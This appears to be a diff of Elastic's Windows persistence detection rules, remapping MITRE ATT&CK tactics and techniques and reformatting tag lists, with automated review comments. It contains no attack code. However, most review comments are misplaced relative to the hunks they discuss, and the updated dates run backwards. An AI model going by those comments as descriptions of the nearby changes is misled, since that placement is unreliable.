"2025/08/26" [rule] author = ["Elastic"] 
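Review bot: This hunk only swaps the order of the two `[[rule.threat]]` entries — the Execution tactic moves from the first entry to the second and Persistence moves the other way — with identical `T1053` / `T1053.005` techniques in both, so the mapping itself is unchanged. Together with the blank-line reshuffle, the hunk is pure churn and could be dropped; if a fixed tactic order (Persistence first) is being enforced across rules, that convention is worth stating in the commit message so the reorder is recognisable as deliberate.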
@@ -61,7 +61,20 @@ Windows services are crucial for running background processes. Adversaries explo risk_score = 73 rule_id = "36a8e048-d888-4f61-a8b9-0f9e2e40f317" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -76,36 +89,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml index f5149a2636f..e3c5bf98f82 100644 --- a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml +++ b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/07" [rule] author = ["Elastic"] 
@@ -86,13 +86,27 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] + +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_sysmon_wmi_event_subscription.toml b/rules/windows/persistence_sysmon_wmi_event_subscription.toml index ce0534283f4..53d948bc8c5 100644 --- a/rules/windows/persistence_sysmon_wmi_event_subscription.toml +++ b/rules/windows/persistence_sysmon_wmi_event_subscription.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/02" integration = ["windows", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -56,7 +56,15 @@ references = [ risk_score = 47 rule_id = "e72f87d0-a70e-4f8d-8443-a6407bc34643" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Sysmon", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Sysmon", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
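Review bot: A Defense Evasion (`TA0005`, `T1112`) entry is added to `rule.threat` here, but unlike the other rules in this chunk there is no `tags` hunk for this file, so the tag list presumably still lists only the tactics it had before; if `"Tactic: Defense Evasion"` is not already present in `tags`, tags and `rule.threat` now disagree and a tactic-tag consistency check will flag the rule. The new entry also has a blank line between `[[rule.threat]]` and `framework = "MITRE ATT&CK"`, which no other entry in the diff has.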
@@ -74,36 +82,19 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.003" name = "Windows Management Instrumentation Event Subscription" reference = "https://attack.mitre.org/techniques/T1546/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.003" -name = "Windows Management Instrumentation Event Subscription" -reference = "https://attack.mitre.org/techniques/T1546/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_system_shells_via_services.toml b/rules/windows/persistence_system_shells_via_services.toml index 22823784c3b..2a0d907bce6 100644 --- a/rules/windows/persistence_system_shells_via_services.toml +++ b/rules/windows/persistence_system_shells_via_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] 
@@ -90,7 +90,21 @@ This rule looks for system shells being spawned by `services.exe`, which is comp risk_score = 47 rule_id = "0022d47d-39c7-4f69-a232-4fe9dc7a3acd" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -106,12 +120,27 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -122,35 +151,10 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml index 696d3b70b43..fbc8a28fda9 100644 --- a/rules/windows/persistence_temp_scheduled_task.toml +++ b/rules/windows/persistence_temp_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] 
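Review bot: Removing `T1569` / `T1569.002 Service Execution` from the Execution entry drops the technique that most directly describes what this rule detects — the description quoted in the earlier `@@ -90,7 +90,21 @@` hunk header says it looks for system shells spawned by `services.exe`. Adding `T1543.003` under Persistence in the previous hunk is reasonable, but that technique covers creating or modifying a service, not running a command through one; keeping `T1569.002` alongside `T1059` under Execution would preserve the more precise mapping. Dropping the Privilege Escalation entry is consistent with the tags change in the previous hunk.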
@@ -54,7 +54,15 @@ references = ["https://docs.microsoft.com/en-us/windows/security/threat-protecti risk_score = 47 rule_id = "81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -66,18 +74,36 @@ sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_time_provider_mod.toml b/rules/windows/persistence_time_provider_mod.toml index 192d83104bd..7b99257a7d9 100644 --- a/rules/windows/persistence_time_provider_mod.toml +++ b/rules/windows/persistence_time_provider_mod.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -105,7 +105,20 @@ references = ["https://pentestlab.blog/2019/10/22/persistence-time-providers/"] risk_score = 47 rule_id = "14ed1aa9-ebfd-4cf9-a463-0ac59ec55204" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -124,18 +137,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.003" name = "Time Providers" reference = "https://attack.mitre.org/techniques/T1547/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.003" +name = "Time Providers" +reference = "https://attack.mitre.org/techniques/T1547/003/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml index f37d13c84d1..708d2187cb4 100644 --- a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml +++ b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/24" [rule] author = ["Elastic", "Skoetting"] 
@@ -51,7 +51,16 @@ references = [ risk_score = 47 rule_id = "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -93,36 +102,14 @@ iam where host.os.type == "windows" and event.action == "added-member-to-group" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_user_account_creation.toml b/rules/windows/persistence_user_account_creation.toml index 2b400ddc389..2bab46a9d12 100644 --- a/rules/windows/persistence_user_account_creation.toml 
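Review bot: Removing the `T1098.007 Additional Local or Domain Groups` sub-technique leaves this rule mapped only to the parent `T1098 Account Manipulation`, although the query fragment in the hunk header (`event.action == "added-member-to-group"`) is exactly the group-membership change that sub-technique describes. Dropping the duplicate Privilege Escalation entry matches the tags hunk above, but the sub-technique should stay on the remaining Persistence entry rather than being removed with it.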
+++ b/rules/windows/persistence_user_account_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -87,18 +87,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" - [[rule.threat.technique.subtechnique]] -id = "T1136.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1136/002/" +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_via_application_shimming.toml b/rules/windows/persistence_via_application_shimming.toml index 68f099a5741..1fb717e1aa7 100644 --- a/rules/windows/persistence_via_application_shimming.toml +++ b/rules/windows/persistence_via_application_shimming.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/01" [rule] author = ["Elastic"] 
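Review bot: The sub-technique is replaced rather than extended — `T1136.002 Domain Account` becomes `T1136.001 Local Account` — and the query body is outside the hunk, so it is not visible whether the rule still matches domain-account creation as well. If it does, both sub-techniques belong under `T1136`; if the mapping is being narrowed because the rule only covers local accounts, the commit message should say so, since this is the only technique change in the chunk that removes coverage without adding a tactic.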
@@ -64,7 +64,20 @@ Application shimming is a Windows feature designed to ensure software compatibil risk_score = 21 rule_id = "fd4a992d-6130-4802-9ff8-829b89ae801f" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -88,36 +101,36 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_via_bits_job_notify_command.toml b/rules/windows/persistence_via_bits_job_notify_command.toml index d2a901ab4b0..d5ed04b003e 100644 --- a/rules/windows/persistence_via_bits_job_notify_command.toml +++ b/rules/windows/persistence_via_bits_job_notify_command.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
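Review bot: The tags hunk for this file on the previous line (`@@ -64,7 +64,20 @@`) drops `Tactic: Privilege Escalation`, but this hunk keeps the second `[[rule.threat]]` entry whose `[rule.threat.tactic]` is `TA0004` / `Privilege Escalation` as unchanged context. Tags and `rule.threat` therefore disagree for this rule, and a tactic-tag consistency check will report the tag as missing. Either restore `"Tactic: Privilege Escalation",` in `tags` or remove the TA0004 entry, as was done for the other rules in this chunk that dropped that tactic.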
@@ -68,7 +68,18 @@ references = [ risk_score = 47 rule_id = "c3b915e0-22f3-4bf7-991d-b643513c722f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -85,26 +96,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1197" -name = "BITS Jobs" -reference = "https://attack.mitre.org/techniques/T1197/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_via_hidden_run_key_valuename.toml b/rules/windows/persistence_via_hidden_run_key_valuename.toml index 7a10e60c00b..1d217e04fb3 100644 --- a/rules/windows/persistence_via_hidden_run_key_valuename.toml +++ b/rules/windows/persistence_via_hidden_run_key_valuename.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -65,7 +65,21 @@ references = [ risk_score = 73 rule_id = "a9b05c3b-b304-4bf9-970d-acdfaef2944c" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", +] timestamp_override = "event.ingested" type = "eql" 
@@ -83,31 +97,43 @@ registry where host.os.type == "windows" and event.type == "change" and length(r [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml index 6abda8ce324..909fe26fa75 100644 --- a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml +++ b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -61,7 +61,20 @@ Security Support Providers (SSPs) in Windows environments facilitate authenticat risk_score = 47 rule_id = "e86da94d-e54b-4fb5-b96c-cecff87e8787" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -84,18 +97,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.005" name = "Security Support Provider" reference = "https://attack.mitre.org/techniques/T1547/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml index f7f30b2155d..5ce887dd079 100644 --- a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml +++ b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
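Review bot: The new side strips the single blank line between `framework = "MITRE ATT&CK"` and `[[rule.threat.technique]]` and between the technique and sub-technique tables, then inserts two blank lines ahead of `[rule.threat.tactic]` (the paired `+` lines before it), which is inconsistent with the layout of the lines being removed. If a serializer produced this, its table separation looks accidental rather than chosen; either way, settle on one layout so later diffs of these files stay minimal. The mapping itself (Persistence/T1547.005 plus Defense Evasion/T1112) does agree with the two `Tactic:` tags this file gains in its tags hunk.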
@@ -96,36 +96,46 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml index 9e805a654b8..4c77031fe53 100644 --- a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml +++ b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] 
